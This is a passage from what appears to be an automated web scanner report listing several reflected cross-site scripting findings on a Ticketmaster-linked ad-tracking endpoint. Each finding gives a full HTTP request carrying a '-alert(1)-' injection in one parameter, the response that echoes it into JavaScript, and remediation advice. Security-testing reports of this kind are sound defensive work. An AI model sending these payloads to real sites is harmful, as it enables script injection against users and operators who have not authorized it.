Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:25 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
1';
var event_time_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='e52e9'-alert(1)-'5f1da305d60';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
...[SNIP]...

4.68. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_majorcatid_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_majorcatid_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9979a'-alert(1)-'e992b3e6fb4 was submitted in the _RM_HTML_majorcatid_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=100019979a'-alert(1)-'e992b3e6fb4&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...

var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='100019979a'-alert(1)-'e992b3e6fb4';
var minorcatid='1';

// For Purchase Tracking
var b3_d = new Image (1,1);
var b3_e = new Image (1,1);
var b3_f = new Image (1,1);
var b3_g = new Image (1,1);
var b3_h = new Image (1,1);
va
...[SNIP]...

4.69. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_minorcatid_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_minorcatid_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c73ac'-alert(1)-'0a88c6c62c5 was submitted in the _RM_HTML_minorcatid_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1c73ac'-alert(1)-'0a88c6c62c5&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
time='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='10001';
var minorcatid='1c73ac'-alert(1)-'0a88c6c62c5';

// For Purchase Tracking
var b3_d = new Image (1,1);
var b3_e = new Image (1,1);
var b3_f = new Image (1,1);
var b3_g = new Image (1,1);
var b3_h = new Image (1,1);
var b3_i = new Image (1,
...[SNIP]...

4.70. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_pdate_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_pdate_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fad1c'-alert(1)-'a553e8d0dcf was submitted in the _RM_HTML_pdate_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=fad1c'-alert(1)-'a553e8d0dcf&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:34 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='fad1c'-alert(1)-'a553e8d0dcf';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='10001';
var min
...[SNIP]...

4.71. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_pday_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_pday_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a206'-alert(1)-'c65f39f1218 was submitted in the _RM_HTML_pday_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=3a206'-alert(1)-'c65f39f1218&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='3a206'-alert(1)-'c65f39f1218';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='10001';
var minorcatid='1';

// For Purchase
...[SNIP]...

4.72. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_ptime_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_ptime_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dba97'-alert(1)-'49efd703601 was submitted in the _RM_HTML_ptime_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=dba97'-alert(1)-'49efd703601&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38441
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='dba97'-alert(1)-'49efd703601';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='10001';
var minorcatid='1';


...[SNIP]...

4.73. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_tixp_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_tixp_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0af1'-alert(1)-'f9277495374 was submitted in the _RM_HTML_tixp_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=b0af1'-alert(1)-'f9277495374&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
t_date='07/20/2011';
var event_time_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='b0af1'-alert(1)-'f9277495374';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var art
...[SNIP]...

4.74. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_venue_name_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_venue_name_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f8ad'-alert(1)-'530dfc3a08e was submitted in the _RM_HTML_venue_name_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium9f8ad'-alert(1)-'530dfc3a08e&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
